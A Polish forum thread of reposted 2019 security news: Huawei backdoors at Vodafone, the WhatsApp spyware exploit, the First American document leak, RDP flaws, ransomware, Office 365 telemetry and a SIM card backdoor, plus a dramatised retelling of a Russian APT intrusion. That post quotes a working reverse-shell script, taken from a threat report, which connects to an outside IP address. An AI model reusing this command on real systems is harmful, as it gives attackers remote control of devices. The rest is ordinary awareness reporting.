Internet - Bezpieczeństwo.

DAE avatar
Tomasz21
Posty: 373
Rejestracja: 27 kwietnia 2019, 20:41

01 maja 2019, 12:48

2019.04.30.02.[PL]-Internet-text- Vodafone zlokalizowało we własnej infrastrukturze backdoory od Huawei
Witam; Przedruk informacji, dosyć ciekawej. W temacie, informatyka – internet – bezpieczeństwo. Ciekawostka, która polecam wszystkim.


Tutaj mamy dość enigmatyczną notatkę w temacie. Zaczyna się dość poważnie:
Europe’s biggest phone company identified hidden backdoors in the software that could have given Huawei unauthorized access to the carrier’s fixed-line network in Italy, a system that provides internet service to millions of homes and businesses
Backdoory miały być wg Bloomberga w dwóch miejscach. Routery domowe:
Vodafone asked Huawei to remove backdoors in home internet routers in 2011 and received assurances from the supplier that the issues were fixed, but further testing revealed that the security vulnerabilities remained, the documents show.
Jak widać z łataniem też nie jest zbyt dobrze…
Gorzej sprawa wygląda z elementami infrastruktury IT:

Vodafone also identified backdoors in parts of its fixed-access network known as optical service nodes, which are responsible for transporting internet traffic over optical fibers, and other parts called broadband network gateways, which handle subscriber authentication and access to the internet, the people said.
Czy były to podatności czy backdoory? Czasem ciężko jest to jednoznacznie stwierdzić. Kiedyś pisaliśmy o tego typu problemie z TP-Linkiem (co było komentowane w świecie). Jeśli podatność daje zdalny dostęp (bez uwierzytelnienia) do systemu i co więcej podatność ta nie występuje w żadnej funkcji dostępnej dla użytkownika – to jak ją nazwać? W przypadku Vodafone może dziwi nieco podejście: „Hej, usuńcie nam te backdoory i będzie OK”.
W każdym razie czekamy na więcej informacji, bo swego czasu Bloomberg również raportował o backdoorze (w komponentach Supermicro), co do tej pory nie miało to dodatkowego potwierdzenia, chociaż odcisnęło pewne ślady na rynku.

:ugeek:
DAE avatar
Tomasz21
Posty: 373
Rejestracja: 27 kwietnia 2019, 20:41

16 maja 2019, 11:16

2019.05.16.01.[PL] - text – Cz.04.-Ciekawostka-Informatyka – Telefon..

Przedruk – informacji.
Podatność w WhatsApp – można zwykłą rozmową zainstalować spyware na telefonie ofiary.


Techniczny opis tutaj. Bardziej słowno-muzyczny – tutaj czy tutaj:
Whatsapp has recently patched a severe vulnerability that was being exploited by attackers to remotely install surveillance malware on a few „selected” smartphones by simply calling the targeted phone numbers over Whatsapp audio call.
Czyli samą rozmową na urządzenie (telefon) ofiary można było jej zainstalować spyware. Co więcej to podatność została uzbrojona w spyware przez izraelską firmę NSO Group. Prawdopodobnie można był uzyskać dostęp do kamery, mikrofonu, e-maili, kontaktów, wiadomości… przynajmniej tyle potrafi flagowy produkt firmy NSO Group – Pegasus.
Załatane wersje: WhatsApp for Android: v2.19.134, WhatsApp Business for Android: v2.19.44, WhatsApp for iOS: v2.19.51, WhatsApp Business: v2.19.51.
0-day był ponoć wykorzystany tylko na niewielką liczbę ‚wybranych ofiar’:

Discovered, weaponized and then sold by the Israeli company NSO Group that produces the most advanced mobile spyware on the planet, the WhatsApp exploit installs Pegasus spyware on to Android and iOS devices.
Martwić też może dość wysoka ‚niewidoczność’ samego faktu ataku na nasze urządzenie:
Also, the victim would not be able to find out about the intrusion afterward as the spyware erases the incoming call information from the logs to operate stealthily.
:ugeek:
DAE avatar
Tomasz21
Posty: 373
Rejestracja: 27 kwietnia 2019, 20:41

30 maja 2019, 09:38

2019.05.30.03.[PL]-text-Ciekawostka-Poufne dokumenty.

Prawie miliard poufnych dokumentów można było pobrać ze strony First American Financial Corp.


130-letni gigant – First American Financial Corp.- (18 000 pracowników) działający w obszarze nieruchomości, miał gigantyczną podatność. Zmieniając numer ID w pewnym linku, można było uzyskać dostęp do poufnych dokumentów:
The digitized records — including bank account numbers and statements, mortgage and tax records, Social Security numbers, wire transaction receipts, and drivers license images — were available without authentication to anyone with a Web browser.
Wg Briana Krebsa, pierwszy dokument, który można było pobrać datowany były na 2003 rok (ID=000000075). Kolejne numery ID to kolejne dokumenty. Ponoć w ten sposób było dostępnych aż 885,000,000+ dokumentów. Ciężko powiedzieć ile z nich mogło realnie dostać się w niepowołane ręce…

Ot taka ciekawostka, co się dzieje na Świecie; Chodzi o dziedzinę Informatyki, i naszego bezpieczeństwa. Czy jesteśmy „Bezpieczni” ? ? ? Co się dzieje z naszymi danymi, które w zaufaniu podajemy do wiadomości urzędników?
Jak oni nas traktują? Czy jesteśmy tylko śmieciem i odpadem po produkcyjnym? Co mamy do powiedzenia na swoją obronę? Czy w ogóle coś mamy do powiedzenia?Czy żyjemy w Matrix-sie? A wy jakie macie zdanie na ten temat? Co można by było zmienić, ulepszyć, aby zwiększyć nasze bezpieczeństwo? Nie mam na myśli, takiej sztucznej ułudy bezpieczeństwa.
Takiego jak uważa Struś, gdy schowa głowę w piasek. ( taka metafora ).
Realnie co można zrobić w tej materii? Pozdrawiam.
:ugeek:
DAE avatar
Tomasz21
Posty: 373
Rejestracja: 27 kwietnia 2019, 20:41

31 maja 2019, 18:04

2019.05.31.04.[PL]-text-Windows-Krytyczna podatność, Ciekawostka.

Windows – Sekurak. Krytyczna podatność.
Krytyczna podatność w RDP (CVE-2019-0708) – prawie milion podatnych Windowsów dostępnych jest w Internecie



O problemie pisaliśmy niedawno – w skrócie, bez uwierzytelnienia można wykonać kod w systemie operacyjnym (uprawnienia SYSTEM) poprzez odpowiednio złośliwą komunikację RDP.
Od tego czasu mamy skaner wykrywający podatność (rdpscan), dość szczegółową analizę podatności, a także około miliona maszyn dostępnych bezpośrednio z Internetu, które nie są załatane.
Lepiej się pospieszcie z łataniem, bo następny krok to będzie już tylko armageddon. Podatne są: Windows 7, Windows Server 2008 R2, Windows Server 2008 + starsze XP-ki i Windows 2003 Serwer.



Ot taka sobie ciekawostka, na temat windy, i jej pochodnych. Takie teksty to jest niemal codzienność. To powinno zmusić do myślenia, a może nie? Jest tego tak dużo, że gdybym chciał wszystkie te przypadłości pokazać? To trzeba by było nowe forum założyć. Zresztą jak ktoś się tym interesuje, to polecam forum – Sekuraka. Jest tego tam całe mnóstwo, i to całkiem świeże. Codziennie, jest coś nowego. Winda, prowadzi zasłużone pierwsze miejsce. Warto wiedzieć, na jakiego konia się obstawia ten wyścig. Który z góry jest skazany na przegraną.
Ot, dodam jeszcze jedną ciekawostkę; Chiny zamierzają w odwecie za „Huawei”- Zrezygnować z windy, i mikro....u. Jak to wprowadzą To pastuchy, się chyba zesrają. Rosja, już to zrobiła; we wszystkich urzędach, policja,+ wojsko. Jak teraz Chińczyki dołączą do spisku? To trochę rynek im się skurczy.
Pozdrawiam.
DAE avatar
Tomasz21
Posty: 373
Rejestracja: 27 kwietnia 2019, 20:41

11 lipca 2019, 19:09

Sodin – nowy ransomware wykorzystuje podatność w Windows w celu eskalacji uprawnień

Witam; ciekawostka, która powinna zaciekawić wszystkich internautów. Jest to przedruk.
Badacze z Kaspersky Lab informują o wykryciu nowego ransomware o nazwie Sodin. Tradycyjnie szyfruje pliki i żąda okupu za odszyfrowanie (płacenie nie jest zalecane, bo w ten sposób wspieramy przestępców). Wszystko wskazuje na to, że malware rozprowadzane jest jako usługa w modulu RaaS.
Sodin korzysta z podatności CVE-2018-8453, która pozwala na zwiększenie uprawnień. Przestępcy wyszukiwali (prawdopodobnie za pomocą wyszukiwarek typu Shodan, ale w informacji nie jest to wyjaśnione) podatne systemy, którym ochronę zapewniał antywirus Webroot, po czym wykonywali polecenie (za pomocą droppera, czyli “malware pobierającego inne malware”) pobrania pliku radm.exe, a więc opisywanego zagrożenia.
Ciekawa jest technika dot. architektury procesora zastosowana w Sodinie:
Wykrycie szkodnika Sodin utrudnia dodatkowo wykorzystywanie przez niego techniki „Heaven’s Gate”. Pozwala ona szkodnikowi wykonać kod 64-bitowy z procesu 32-bitowego, co nie jest powszechną praktyką i nieczęsto występuje w oprogramowaniu ransomware.
Pewien użytkownik Reddita napisał, że atakujący uzyskuje dostęp do maszyny poprzez protokół RDP, zwiększa uprawnienia, dezaktywuje antywirusa i kopie zapasowe, a następnie pobiera Sodina. Malware zostało zauważone głównie w Azji (Tajwan, Hongkong, Korea Południowa). Nie oznacza to jednak, że użytkownicy systemu Windows na innych kontynentach mogą czuć się bezpiecznie.
Standardowo przede wszystkim należy pamiętać o regularnym wykonywaniu kopii zapasowych.  Pozdrawiam.
:ugeek:
DAE avatar
Tomasz21
Posty: 373
Rejestracja: 27 kwietnia 2019, 20:41

17 lipca 2019, 00:18

2019.07.16.02.-text- Office 365 nielegalny w Niemczech?

Office 365 nielegalny w Niemczech? Tak – przynajmniej w części szkół. Obawy o poufność…


Co może być podejrzanego w Microsoft Office 365? Wymieniane są głównie trzy rzeczy:
Zapisywanie danych w chmurze, która fizycznie znajduje się poza terytorium UE (choć wg RODO czy GDPR wcale tak nie musi być)w tym chodzi tu o takie „kwiatki (wysyłka dokumentów Worda, które są konwertowane na PDF do chmury (!?!)). Można się też zastanawiać gdzie w tej sytuacji wysyłany jest nasz głos (automatyczne tłumaczenie naszego głosu przez PowerPoint)
Wysyłanie danych telemetrycznych (również tych z Office)

Dostęp urzędników amerykańskich (w tym należących do pewnych służb…) do zasobów chmurowych (niezależnie czy zlokalizowane są one w EU czy nie)
Kilka tego typu problemów zostało właśnie opisanych w oświadczeniu heskiego komisarza ds. Ochrony danych i wolności informacji na temat korzystania z usługi Microsoft Office 365 w szkołach Hesji:
Użycie Office 365 w szkołach jest nielegalnie, jeśli szkoły przechowują dane osobowe w europejskiej chmurze.
Pojawiają się komentarze, że nie jest próba wyrugowania Microsoftu, ale raczej zmuszenia go do większej uległości w kontekście ochrony danych. W szczególności chmura europejska niech sobie będzie, ale Niemcy chcą lokalizacji danych użytkowników Office we własnym kraju. Obecnie wygląda to mniej więcej tak:
Nie milkną też zastrzeżenia w temacie telemetrii. Niby centra danych są w UE, ale centra danych telemetrii…a to już inna sprawa. Przecież telemetria nie operuje na wrażliwych danych, czy danych osobowych, prawda? Nie prawda. Niedawno mogliśmy poczytać o aferze dotyczącej m.in. wysyłania fragmentów maili czy zdań z dokumentów na serwery Microsoftu:
Investigators admitted that Microsoft collected functional and diagnostics data that is usually a standard practice among software developers, but they also found that Office applications also collected actual content from users’ applications, such as email subject lines and sentences from documents where the company’s translation or spellchecker tools were used.
W obecnym oświadczeniu ponownie został wskazany ten wątek [(C) Google Translator]:
Dzięki systemowi operacyjnemu Windows 10 bogactwo danych telemetrycznych jest przesyłane do firmy Microsoft, której treść nie została ostatecznie wyjaśniona pomimo wielokrotnych zapytań w firmie Microsoft. Takie dane są również przesyłane podczas korzystania z usługi Office 365.
Microsoft dziękuje niemieckiemu komisarzowi, pisząc że prywatność jest ważna i linkując swoje standardowe bla bla bla. Tymczasem nie udostępnia prostego narzędzia umożliwiającego dokładne kontrolowanie danych wysyłanych w ramach telemetrii czy innych działań. Ba, wręcz na domyślnej instalacji Office widzimy takie kwiatki (zauważcie poniżej wyszarzony checkbox – normalnie nie ma możliwości jego odznaczenia):Diagnostyka…
Dane diagnostyczne są używane do zapewnienia bezpieczeństwa i aktualizacji pakietu Office, rozwiązania problemów oraz wprowadzenia ulepszeń produktu
( w organizacji tę preferencję może skonfigurować administrator ).

Wysyłaj pełne dane diagnostyczne; Udostępniaj informacje dotyczące sposobu
użycia aplikacji, funkcji i urządzeń. Mogą to być podstawowe dane diagnostyczne i rozszerzone raportowania błędów.


Jednocześnie w pośpiechu Microsoft uruchamia z końcem 2019 Office-owe data center w Niemczech. Choć niedawno je zamknął…
–Michał Sajdak.
Tekst został, skopiowany i powielony; miłej lektury. Pozdrawiam.
:ugeek:
DAE avatar
Tomasz21
Posty: 373
Rejestracja: 27 kwietnia 2019, 20:41

04 sierpnia 2019, 08:16

Witam; Posyłam taką ciekawostkę; dotyczy ona bezpieczeństwa, w internecie. Nie rozważny krok, czyli klikamy; i mamy zaszyfrowane pliki, chcą okupu. Aby odszyfrować. A czy odszyfrują? Tego już nikt nie wie. Tak działa winda, taka jej specyfika, i urok. Tego gów-a - jest więcej. Klientela windy jest łatwą zdobyczą. Ten system to umożliwia; Pozdrawiam, ku przestrodze.
Ta miła pani rozsyła swoje CV, następnie „szyfruje” Twoje pliki samymi zerami i żąda okupu

Dość intensywna kampania startująca od maili phishingowych, wyglądających jak normalne zgłoszenie chęci do pracy:

W mailu mamy normalny plik .jpg: Jest to zdjęcie ładnej, atrakcyjnej kobiety.

CV... Plus już mniej normalny plik .zip , zawierający windowsowy .lnk. Po jego uruchomieniu następuje nieodwracalne „szyfrowanie” plików poprzez nadpisanie ich zerami oraz prośba o wpłacenie okupu. W skrócie cały proces wygląda tak.
Pamiętajcie, piękne panie to… coś na co trzeba uważać ;-)
Pozdrawiam.
:ugeek:
DAE avatar
Tomasz21
Posty: 373
Rejestracja: 27 kwietnia 2019, 20:41

07 sierpnia 2019, 09:39

2019.08.07.01.[PL]-text- Informatyka-Ciekawostka-Czarny humor.

Witam; Ciekawe i śmieszne. Ale bardzo realne. No może nie w naszym świecie, wiedzy o informatyce, ale to jest bardzo prawdopodobne. Jest to bardzo prawdopodobny scenariusz. Można by o tym zrobić film. Pozdrawiam.
:ugeek:

Siergiej ruszaj dupę!!! Kliknęli w linka, wbijaj się bistro na tę drukarkę i jedziemy dalej!


Zapowiadał się kolejny spokojny wieczór. Mały pokój w jednym z moskiewskich biur, z porozwalanymi pudełkami po pizzy i rozrzuconymi niemal wszędzie butelkami po wyśmienitym napoju Bajkał.
– Te Wowa, widziałeś te nowe dumpy 0-dayów na IoT z chińskich forów? Centrala podrzuciła dzisiaj na to namiary.
– No… widziałem. TP-Linki,  routerki ASUS-a, masa kamer, drukarki, nagrywarki wideo, nawet jakieś exploiciki na zabawki. Chinole się nie pierdzielą tylko udostępniają tego na potęgę. Pełne exploity a nie jakieś PoC-e. Aż dziw bierze, że te łośki zza oceanu jeszcze niczego z tym nie zrobili. Coś tam próbowali wprowadzać ustawy czy coś ale się rozeszło hehehe. Ustawą wymóc bezpieczeństwo? buahahaha spuentował śmiechem Wowa.
– No to są jaja, co my tu mamy… zahardkodowane backdoorowe konta, o a tu port debug gdzie można dostać się na roocika. Serial z dostępem na roota bez hasła. E, to słabe bo trzeba mieć fizyczny dostęp. O, a tu wydobyli kluczyk krypto z EEPROMA, haha. Gulp, gulp, Siergiej przepił smakowite exploitowe kąski Bajkałem.
– Hej! Patrz co się dzieje! Kliknęli!
– Co?
Butelka Siergieja poleciała na klawiaturę.
– Co ty wyrabiasz! Wszystko w tym słodkim syfie. Zapylaj po backup a ja jadę! Wykrzyknął Wowa.
Tydzień wcześniej grupa STRONT dostała z reconu trochę informacji o wewnętrznej adresacji jednego z amerykańskich szpitali realizujących program badawczy. Ponoć dla wojska; z pewnością warto sprawdzić ten wątek.
Hmm dobra nasza poszedł jeden CSRF na jedną z ich drukarek  – pomyślał Wowa. Taaa domyślne hasełka. Dobra wbijam.
– Sieeeeergieeej ruszaj dupę. Dawaj tego exploita na drukarki HP. Mam tam webowego admina, ale  chcę mieć  roota!!!
– Yyyhhhaahhh, noo… Już.
[ 10 minut później ]
– Jesteśmy. Cholera kernel 2.4, łooo zrzucaj pamięć i konfiga ile się da. Ja skanuję sieć.
– Dawaj na początek tcpdumpa, zostawi mniej śladu. Łap statyczną binarkę.
– Dzięki, puszczam. C&C gotowe?
– Chwila… dawaj, gotowe. Pamiętaj żeby przepuścić to zaszyfrowane.
– Leci.
[ 5 minut później ]
– Co tam mamy? Domyślne community stringi, trochę XP-ków, oooo niezabezpieczony OSPF. Dawaj skrypty scapy, spróbuję sprawdzić czy da się wstrzyknąć parę pakietów żeby przekonfigurować tablicę routingu. Poszukasz jakiejś maszyny przez, którą przepuścimy ruch? Ta drukarka może nam kipnąć jak zalejemy ją ruchem zebranym z całej sieci!
– Dobra, obadam te XP-ki. Jak mają RDP to może zadziała Bluekeep. Tydzień temu przejęliśmy tym pół sieci, centrala ma łepskich gości, exploit działa jak złoto!
[ 30 minut później ]
– Cholera, prawie zero zabezpieczeń, jak oni o robią? Mamy puszczony ruch przez tego XP-ka. To jakiś system do obróbki zdjęć rentgenowskich, chyba nie dali do tej maszyny nowszych drajwerów niż do XP-ka.
– Ile mamy maszynek?
– Kilka telefonów, rekorder wideo, dwie drukarki, parę Windowsów.
– Wszystko w jednej podsieci czy w osobnych?
– No tu jest tylko jedna sieć, łamago!
– Dobra, bierzmy na cel tego hosta med-arpa-data. Coś tam mamy?
– Wszystko popatchowane, dostępne tylko dwa porty – 80, 443. Dupa.
– Jaka dupa? Dawaj delikatnie ettercapa, ja włączam tcpdumpa i zobaczymy.
[ godzinę później ]
– Łooooosz, na arpa-data zalogował się admin.
– http / https?
Mina Siergieja popijającego z ukontentowaniem szklaneczkę Bajkału mówiła wszystko.
– Noevilshallpass!
– Hehe, nie wierzę, http!?
– Skup się, mamy admina, dumpujemy dane, czyścimy i znikamy
– Czyścimy? może coś sobie zostawmy…?
***
To lekko podkolorowana historia, którą właśnie opisuje ekipa Microsoft Threat Intelligence Center. Tym razem na wrogich działaniach przyłapana została grupa o kodowej nazwie STRONT, mapowana na jedną z rosyjskich jednostek APT:
 80% of STRONTIUM attacks have largely targeted organizations in the following sectors: government, IT, military, defense, medicine, education, and engineering. We have also observed and notified STRONTIUM attacks against Olympic organizing committees, anti-doping agencies, and the hospitality industry.
Co dokładniej się stało? Więcej macie w tekście powyżej ;-) A Microsoft relacjonuje to w ten sposób, kładąc szczególny nacisk na wykorzystanie problemów w podatnych urządzeniach IoT:
(…) research uncovered attempts by the actor to compromise popular IoT devices (a VOIP phone, an office printer, and a video decoder) across multiple customer locations. The investigation uncovered that an actor had used these devices to gain initial access to corporate networks. In two of the cases, the passwords for the devices were deployed without changing the default manufacturer’s passwords and in the third instance the latest security update had not been applied to the device.
I dalej:
These devices became points of ingress from which the actor established a presence on the network and continued looking for further access. Once the actor had successfully established access to the network, a simple network scan to look for other insecure devices allowed them to discover and move across the network in search of higher-privileged accounts that would grant access to higher-value data.  After gaining access to each of the IoT devices, the actor ran tcpdump to sniff network traffic on local subnets.
Na deser jeszcze jeden ze skryptów zlokalizowanych na zaatakowanych urządzeniach IoT:
—contents of [IOT Device] file-- #!/bin/sh export [IOT Device] ="-qws -display :1 -nomouse" echo 1|tee /tmp/.c;sh -c '(until (sh -c "openssl s_client -quiet -host 167.114.153.55 -port 443 |while : ; do sh && break; done| openssl s_client -quiet -host 167.114.153.55 -port 443"); do (sleep 10 && cn=$((`cat /tmp/.c`+1)) && echo $cn|tee /tmp.c && if [ $cn -ge 30 ]; then (rm /tmp/.c;pkill -f 'openssl'); fi);done)&' & --end contents of file--
DAE avatar
Tomasz21
Posty: 373
Rejestracja: 27 kwietnia 2019, 20:41

14 sierpnia 2019, 12:24

2019.08.14.01.[PL]-tekst- Krytyczne podatności w windowsowym Remote Desktop Services. Witam; Ciekawostka z branży informatycznej, może was zaciekawi. A jeśli nie, to przynajmniej będziecie wiedzieli, że coś takiego istnieje. Pozdrawiam.

Krytyczne podatności w windowsowym Remote Desktop Services – można zdalnie, bez uwierzytelnienia przejmować komputery (dostęp na admina)


Podatności w Remote Desktop Services Microsoft opisuje tutaj:
 CVE-2019-1181,
CVE-2019-1182,
CVE-2019-1222,
CVE-2019-1226.
Nie owijając zbytnio w bawełnę:
W RDP jest podatność klasy RCE, którą można wykorzystać bez uwierzytelnienia przez przesłanie odpowiednio złośliwej komunikacji. Podatność nie wymaga interakcji ofiary, a atakujący może wykonywać dowolne polecenia na docelowym systemie, łącznie z tworzeniem kont z pełnymi uprawnieniami.
A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
Jak widać, podatne są systemy klienckie od Windows 7 (również 8 oraz 10), oraz edycje serwerowe (od 2008 serwer). Sam Microsoft uczciwie dodaje że możliwe jest stworzenie samoistnie propagującego się robaka:
Like the previously-fixed ‘BlueKeep’ vulnerability (CVE-2019-0708), these two vulnerabilities are also ‘wormable’, meaning that any future malware that exploits these could propagate from vulnerable computer to vulnerable computer without user interaction.
Polecamy skrupulatne załatanie swoich systemów, zanim ktoś przygotuje bojowego exploita, umożliwiającego automatyczną propagację.
:ugeek:
DAE avatar
Tomasz21
Posty: 373
Rejestracja: 27 kwietnia 2019, 20:41

13 września 2019, 21:47

2019.09.12.01.[PL]-text-Backdor-na kartach SIM.
Backdoor na kartach SIM był/jest używany do szpiegowania przez ostatnie 2 lata. Atak jest niezależny od telefonu!

Tak twierdzi firma AdaptiveMobile Security, a atak opiera się na specjalnym oprogramowaniu wgranym na pewne karty SIM. Jak może niektórzy wiedzą, karta SIM to nie takie całkiem głupie urządzenie – posiada bowiem całkiem sporo pamięci i prosty procesor. Można tam wgrać zatem oprogramowanie – np. [email protected] Browser, który jest (był/jest) używany do celów diagnostycznych. Zacytujmy obszerniejszy fragment:
This [email protected] Browser software is not well known, is quite old, and its initial purpose was to enable services such as getting your account balance through the SIM card. Globally, its function has been mostly superseded by other technologies, and its specification has not been updated since 2009, however, like many legacy technologies it is still been used while remaining in the background. In this case we have observed the [email protected] protocol being used by mobile operators in at least 30 countries whose cumulative population adds up to over a billion people, so a sizable amount of people are potentially affected.
Jak całość działa? Prosto – atakujący wysyła do ofiary SMS-a, a zwrotnie dostaje informację o geolokalizacji ofiary. Co ciekawe ofiara nie widzi SMS-a, który „zaatakował”:

Atak
Martwić też może fakt, że wg badaczy taki exploit to nie teoria, ale praktyka używana bojowo od dłuższego czasu:
We are quite confident that this exploit has been developed by a specific private company that works with governments to monitor individuals.
Co więcej potrafi tajemnicze oprogramowanie? Otworzyć stronę w przeglądarce telefonu (np. z exploitem), wysłać SMS-a w imieniu ofiary, wykonać połączenie telefoniczne w imieniu ofiary. Całość jest też niezależna od marki telefonu:
We have observed devices from nearly every manufacturer being successfully targeted to retrieve location: Apple, ZTE, Motorola, Samsung, Google, Huawei, and even IoT devices with SIM cards.
Mało zabawnie.
:ugeek:
ODPOWIEDZ

Wróć do „Internet i komputery”